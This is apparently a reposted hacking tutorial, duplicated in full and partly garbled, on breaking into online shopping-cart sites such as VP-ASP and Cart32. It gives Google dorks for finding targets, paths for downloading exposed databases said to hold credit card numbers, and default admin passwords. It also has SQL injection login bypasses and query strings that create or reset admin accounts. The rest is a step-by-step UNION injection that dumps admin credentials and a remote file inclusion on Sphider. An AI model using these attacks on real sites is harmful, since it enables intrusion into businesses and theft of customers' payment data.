Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites hmmm, Good Q.
Finding VP-ASP 5.00 sites is so simple...
Go to google.com
and type.
intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
Version: 5.00
How to find VP-ASP 5.00 sites hmmm, Good Q.
Finding VP-ASP 5.00 sites is so simple...
Go to google.com
and type.
intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
Nguồn Internet
the page will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this>
****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.
the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp
if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
-------------------------------------------
Google Dork :---> allinurl:/shopadmin.asp
Target looks like :--> http://www.xxxxxx.com/xxxx/shopadmin.asp
Now u Need to Know xdatabase
To know xdatabase u need to rename shopadmin.asp to shopdbtest.asp
target looks like :--> http://www.xxxxxx.com/xxxx/shopdbtest.asp
So the xdatabase is shopping350
Now exploit is http://www.xxxxx.com/xxxx/shopping350.mdb
Save the Database
Database Contains CCs
--------------------------------------------------
google dork :--> allinurl:/cart32.exe/
target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-bin ... oItemFound
chage NoItemFound whit error
When we found Page error dig installation information beneath it, meant us was successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
paste one by one, file.C32 at the end url has been modified earlier, with the formathttp://www.xxxxx.com/cart32/
----------------------------------------------------
google dork :--> inurl:\"/cart.php?m=\"
target looks lile :--> http://xxxxxxx.com/store/cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or\"=\"
Password : 'or\"=\"
---------------------------------------------------------
google dork :--> allinurlroddetail.asp?prod=
target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb
------------------------------------------------------------
google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.com/cgi-local/shopper ... ction&key=
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.com/cgi-local/shopp ... =order.log
---------------------------------------------------------------
google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp
------------------------------------------------------------
google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.
-----------------------------------------------------------
1/search google: allinurl:\" shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5
2/find error by adding '
---> http://victim.com/shopdisplayproducts.asp?id=5'
--->error: Microsolf JET database engine error \"80040e14\"...../shop$db.asp, line467
-If you don't see error then change ip to cat
--->http://victim.com/shopdisplayproducts.asp?cat=5'
3/if this shop has error then add this: %20union%20select%201%20from%20tbluser\"having%201 = 1--sp_password
--->http://victim.com/shopdisplayproduct...on%20select%201%20from%20tbluser\"having%201=1--sp_password
--->error: 5' union select 1 from tbluser \"having 1=1--sp_password.... The number ofcolumn in the two selected tables or queries of a union queries do not match......
4/ add 2,3,4,5,6.......until you see a nice table
add 2
---->http://victim.com/shopdisplayproduct...on%20select%201,2%20from%20tbluser\"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%201,2,3%20from%20tbluser\"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%201,2,3,4%20from%20tbluser\"having%201=1--sp_password
...5,6,7,8,9.... untill you see a table. (exp:...47)
----> http://victim.com/shopdisplayproducts.a ... 0select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser\ " having%201=1--sp_password
---->see a table.
5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
---> http://victim.com/shopdisplayproducts.a ... 20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin1.asp
not work? then u have to find yourself:
add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration\"h a ving%201=1--sp_password
--->http://victim.com/shopdisplayproduct...n%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration\"h a ving%201=1--sp_password
you'll see something like: ( lot of them)
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............
then guess admin link by add these above data untill you find admin links
--------------------------------------------------------------
Sphider Version 1.2.x (include_dir) remote file include
# Sphider Version 1.2.x (include_dir) remote file include
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = \"./include\"; <--- no patch here
$language_dir = \"./languages\";
include \"$include_dir/index_header.inc\";
include \"$include_dir/conf.php\";
include \"$include_dir/connect.php\";
exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu?
the page will be like this > ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this>
****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn't download the Database..
Try this while there is dblocation.
xDblocation
resx
the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.
the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp
if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
-------------------------------------------
Google Dork :---> allinurl:/shopadmin.asp
Target looks like :--> http://www.xxxxxx.com/xxxx/shopadmin.asp
Now u Need to Know xdatabase
To know xdatabase u need to rename shopadmin.asp to shopdbtest.asp
target looks like :--> http://www.xxxxxx.com/xxxx/shopdbtest.asp
So the xdatabase is shopping350
Now exploit is http://www.xxxxx.com/xxxx/shopping350.mdb
Save the Database
Database Contains CCs
--------------------------------------------------
google dork :--> allinurl:/cart32.exe/
target looks :--> http://www.xxxxxx.net/wrburns_s/cgi-bin ... oItemFound
chage NoItemFound whit error
When we found Page error dig installation information beneath it, meant us was successful!
If shares this was gotten list file the format/the suffix.C32 significant in site.Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor.
The substitute string url tsb.To like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
paste one by one, file.C32 at the end url has been modified earlier, with the formathttp://www.xxxxx.com/cart32/
----------------------------------------------------
google dork :--> inurl:\"/cart.php?m=\"
target looks lile :--> http://xxxxxxx.com/store/cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :--> http://xxxxxx.com/store/admin
Usename : 'or\"=\"
Password : 'or\"=\"
---------------------------------------------------------
google dork :--> allinurlroddetail.asp?prod=
target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb
------------------------------------------------------------
google dork :--> allinurl: /cgi-local/shopper.cgi
target looks like :--> http://www.xxxxxx.com/cgi-local/shopper ... ction&key=
exploit :--> ...&template=order.log
target whit exploit :--> http://www.xxxxxxxx.com/cgi-local/shopp ... =order.log
---------------------------------------------------------------
google dork :--> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
login page: http://xxxxxxx/vpasp/shopadmin.asp
------------------------------------------------------------
google.com:--> allinurl:/shop/category.asp/catid=
target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :--> /admin/dbsetup.asp
target whit exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.
-----------------------------------------------------------
1/search google: allinurl:\" shopdisplayproducts.asp?id=
--->http://victim.com/shopdisplayproducts.asp?id=5
2/find error by adding '
---> http://victim.com/shopdisplayproducts.asp?id=5'
--->error: Microsolf JET database engine error \"80040e14\"...../shop$db.asp, line467
-If you don't see error then change ip to cat
--->http://victim.com/shopdisplayproducts.asp?cat=5'
3/if this shop has error then add this: %20union%20select%201%20from%20tbluser\"having%201 = 1--sp_password
--->http://victim.com/shopdisplayproduct...on%20select%201%20from%20tbluser\"having%201=1--sp_password
--->error: 5' union select 1 from tbluser \"having 1=1--sp_password.... The number ofcolumn in the two selected tables or queries of a union queries do not match......
4/ add 2,3,4,5,6.......until you see a nice table
add 2
---->http://victim.com/shopdisplayproduct...on%20select%201,2%20from%20tbluser\"having%201=1--sp_password
then 3
---->http://victim.com/shopdisplayproduct...on%20select%201,2,3%20from%20tbluser\"having%201=1--sp_password
then 4 ---->http://victim.com/shopdisplayproduct...on%20select%201,2,3,4%20from%20tbluser\"having%201=1--sp_password
...5,6,7,8,9.... untill you see a table. (exp:...47)
----> http://victim.com/shopdisplayproducts.a ... 0select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser\ " having%201=1--sp_password
---->see a table.
5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
---> http://victim.com/shopdisplayproducts.a ... 20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin1.asp
not work? then u have to find yourself:
add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration\"h a ving%201=1--sp_password
--->http://victim.com/shopdisplayproduct...n%20select%201,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration\"h a ving%201=1--sp_password
you'll see something like: ( lot of them)
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
..............
then guess admin link by add these above data untill you find admin links
--------------------------------------------------------------
Sphider Version 1.2.x (include_dir) remote file include
# Sphider Version 1.2.x (include_dir) remote file include
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = \"./include\"; <--- no patch here
$language_dir = \"./languages\";
include \"$include_dir/index_header.inc\";
include \"$include_dir/conf.php\";
include \"$include_dir/connect.php\";
exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu?
Không có nhận xét nào:
Đăng nhận xét